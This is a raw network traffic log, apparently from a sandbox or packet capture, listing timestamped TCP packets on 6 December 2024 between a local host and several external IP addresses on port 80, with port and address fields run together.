                                                                            Dec 6, 2024 17:36:58.828217983 CET804972884.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:59.730412960 CET4973480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:59.851919889 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:36:59.854559898 CET4973480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:59.864487886 CET4973480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:36:59.984523058 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.952725887 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.952761889 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.952775002 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.952843904 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.952863932 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.952883959 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.952886105 CET4973480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:37:00.952896118 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.952917099 CET4973480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:37:00.952936888 CET4973480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:37:00.952981949 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.952994108 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.953006029 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:00.953011036 CET4973480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:37:00.953052044 CET4973480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:37:00.957626104 CET4973480192.168.2.1284.32.84.32
                                                                            Dec 6, 2024 17:37:01.077645063 CET804973484.32.84.32192.168.2.12
                                                                            Dec 6, 2024 17:37:06.757599115 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:06.877474070 CET8049750209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:06.877567053 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:06.896686077 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:07.016499996 CET8049750209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:08.102135897 CET8049750209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:08.102215052 CET8049750209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:08.102345943 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:08.411303997 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:09.431288958 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:09.551214933 CET8049756209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:09.551981926 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:09.570456982 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:09.690413952 CET8049756209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:10.795449018 CET8049756209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:10.857460022 CET8049756209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:10.857515097 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:11.083372116 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:12.102260113 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:12.223153114 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:12.226552010 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:12.246458054 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:12.366875887 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:12.366906881 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:13.493470907 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:13.493568897 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:13.493688107 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:13.755067110 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:14.777179003 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:14.897243023 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:14.897384882 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:14.911601067 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:15.031780958 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:16.122333050 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:16.122354031 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:16.122569084 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:16.158673048 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:16.282896042 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:21.688560963 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:21.808731079 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:21.808911085 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:21.828545094 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:21.948658943 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:23.333261013 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:23.345650911 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:23.345709085 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:23.345716000 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:23.345760107 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:23.453212976 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:23.453272104 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:24.354476929 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:24.474229097 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:24.474356890 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:24.490030050 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:24.612837076 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:26.005117893 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:26.010193110 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:26.010226965 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:26.010310888 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:26.010310888 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:26.125116110 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:26.125360012 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:27.025895119 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:27.146043062 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:27.146152020 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:27.162319899 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:27.282337904 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:27.282351971 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:28.676989079 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:28.696182013 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:28.696232080 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:28.696443081 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:28.696482897 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:28.797300100 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:28.797372103 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:29.698501110 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:29.818655968 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:29.818757057 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:29.829133987 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:29.950495005 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:31.396498919 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:31.396567106 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:31.396749020 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:31.405069113 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:31.524960995 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:37.445775032 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:37.565692902 CET8049827208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:37.570517063 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:37.583045006 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:37.702857971 CET8049827208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:38.720045090 CET8049827208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:38.720283031 CET8049827208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:38.720331907 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:39.098893881 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:40.120718956 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:40.240761042 CET8049833208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:40.240916014 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:40.258650064 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:40.383773088 CET8049833208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:41.387670040 CET8049833208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:41.387698889 CET8049833208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:41.387773991 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:41.771814108 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:42.791459084 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:42.911418915 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:42.911509037 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:42.931548119 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:43.051685095 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:43.051747084 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:44.065747976 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:44.066118956 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:44.066272974 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:44.442737103 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:45.472079039 CET4984980192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:45.591990948 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:45.596596956 CET4984980192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:45.604543924 CET4984980192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:45.724373102 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:46.782130003 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:46.782362938 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:46.782407999 CET4984980192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:46.785820961 CET4984980192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:46.905585051 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:38:00.995675087 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:01.115773916 CET8049886172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:01.115905046 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:01.163803101 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:01.283626080 CET8049886172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:02.677033901 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:02.797312021 CET8049886172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:02.797363043 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:03.698577881 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:03.818363905 CET8049892172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:03.819113016 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:03.833421946 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:03.953969955 CET8049892172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:05.348890066 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:05.474625111 CET8049892172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:05.474678040 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:06.367798090 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:06.489490986 CET8049898172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:06.492808104 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:06.510576010 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:06.630774021 CET8049898172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:06.630887032 CET8049898172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:08.020986080 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:08.141393900 CET8049898172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:08.141530991 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:09.040638924 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:09.160520077 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:09.160644054 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:09.171531916 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:09.292165041 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.821933985 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.821950912 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.821973085 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.821984053 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.822163105 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.822339058 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.852727890 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852749109 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852761030 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852910995 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852924109 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852937937 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.854649067 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.885850906 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.886045933 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.942487001 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.942528963 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.942709923 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.950690031 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:12.071609020 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:17.706614017 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:17.826637983 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:17.826817036 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:17.844314098 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:17.964191914 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:18.925440073 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:18.925489902 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:18.925503969 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:18.925602913 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:19.349114895 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:20.368021965 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:20.487875938 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:20.488034964 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:20.509768009 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:20.629483938 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:21.596107960 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:21.596133947 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:21.596177101 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:21.596621990 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:21.596663952 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:22.021079063 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:23.041205883 CET4994180192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:23.161185980 CET8049941199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:23.161288977 CET4994180192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:23.180535078 CET4994180192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:23.300307035 CET8049941199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:23.300426006 CET8049941199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:24.271527052 CET8049941199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:24.271774054 CET8049941199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:24.271787882 CET8049941199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:24.271864891 CET4994180192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:24.271864891 CET4994180192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:24.692662954 CET4994180192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:25.714649916 CET4994880192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:25.834692955 CET8049948199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:25.834919930 CET4994880192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:25.846615076 CET4994880192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:25.967057943 CET8049948199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:26.938834906 CET8049948199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:26.938864946 CET8049948199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:26.938879013 CET8049948199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:26.939013004 CET4994880192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:26.942259073 CET4994880192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:27.062215090 CET8049948199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:32.692593098 CET4996480192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:32.812482119 CET8049964199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:32.812556982 CET4996480192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:32.832287073 CET4996480192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:32.952184916 CET8049964199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:33.910063982 CET8049964199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:33.910101891 CET8049964199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:33.910114050 CET8049964199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:33.912697077 CET4996480192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:34.350634098 CET4996480192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:35.368350983 CET4997380192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:35.488538027 CET8049973199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:35.488620996 CET4997380192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:35.508073092 CET4997380192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:35.628163099 CET8049973199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:36.584779024 CET8049973199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:36.584816933 CET8049973199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:36.584979057 CET8049973199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:36.585063934 CET4997380192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:37.021029949 CET4997380192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:38.042668104 CET4997980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:38.162679911 CET8049979199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:38.163043976 CET4997980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:38.180869102 CET4997980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:38.302829981 CET8049979199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:38.302872896 CET8049979199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:39.268841982 CET8049979199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:39.268959999 CET8049979199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:39.269011021 CET4997980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:39.269155979 CET8049979199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:39.269198895 CET4997980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:39.692779064 CET4997980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:40.712954044 CET4998580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:40.834562063 CET8049985199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:40.834635019 CET4998580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:40.847820997 CET4998580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:40.967674971 CET8049985199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:41.949567080 CET8049985199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:41.949680090 CET8049985199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:41.949692965 CET8049985199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:41.949933052 CET4998580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:41.952963114 CET4998580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:42.072763920 CET8049985199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:47.249382019 CET5000180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:47.370773077 CET8050001104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:47.370969057 CET5000180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:47.386852980 CET5000180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:47.506764889 CET8050001104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:48.528377056 CET8050001104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:48.529622078 CET8050001104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:48.529808998 CET5000180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:48.898072958 CET5000180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:49.918682098 CET5000780192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:50.038911104 CET8050007104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:50.042922020 CET5000780192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:50.058731079 CET5000780192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:50.178594112 CET8050007104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:51.231123924 CET8050007104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:51.231142998 CET8050007104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:51.231199026 CET5000780192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:51.567842007 CET5000780192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:52.587269068 CET5001680192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:52.707139969 CET8050016104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:52.707230091 CET5001680192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:52.727773905 CET5001680192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:52.848541021 CET8050016104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:52.848553896 CET8050016104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:53.955550909 CET8050016104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:53.955918074 CET8050016104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:53.956005096 CET5001680192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:54.242705107 CET5001680192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:55.259362936 CET5002180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:55.379808903 CET8050021104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:55.379905939 CET5002180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:55.392103910 CET5002180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:55.512247086 CET8050021104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:56.544302940 CET8050021104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:56.545413017 CET8050021104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:38:56.546962976 CET5002180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:56.550683022 CET5002180192.168.2.12104.21.90.137
                                                                            Dec 6, 2024 17:38:56.670505047 CET8050021104.21.90.137192.168.2.12
                                                                            Dec 6, 2024 17:39:02.382711887 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:02.503170013 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:02.506942034 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:02.526726007 CET5002280192.168.2.12108.179.253.197
                                                                            Dec 6, 2024 17:39:02.646538973 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.765054941 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.765098095 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.765111923 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.765125036 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.765223980 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.765295982 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.765342951 CET8050022108.179.253.197192.168.2.12
                                                                            Dec 6, 2024 17:39:03.765357018 CET8050022108.179.253.197192.168.2.12
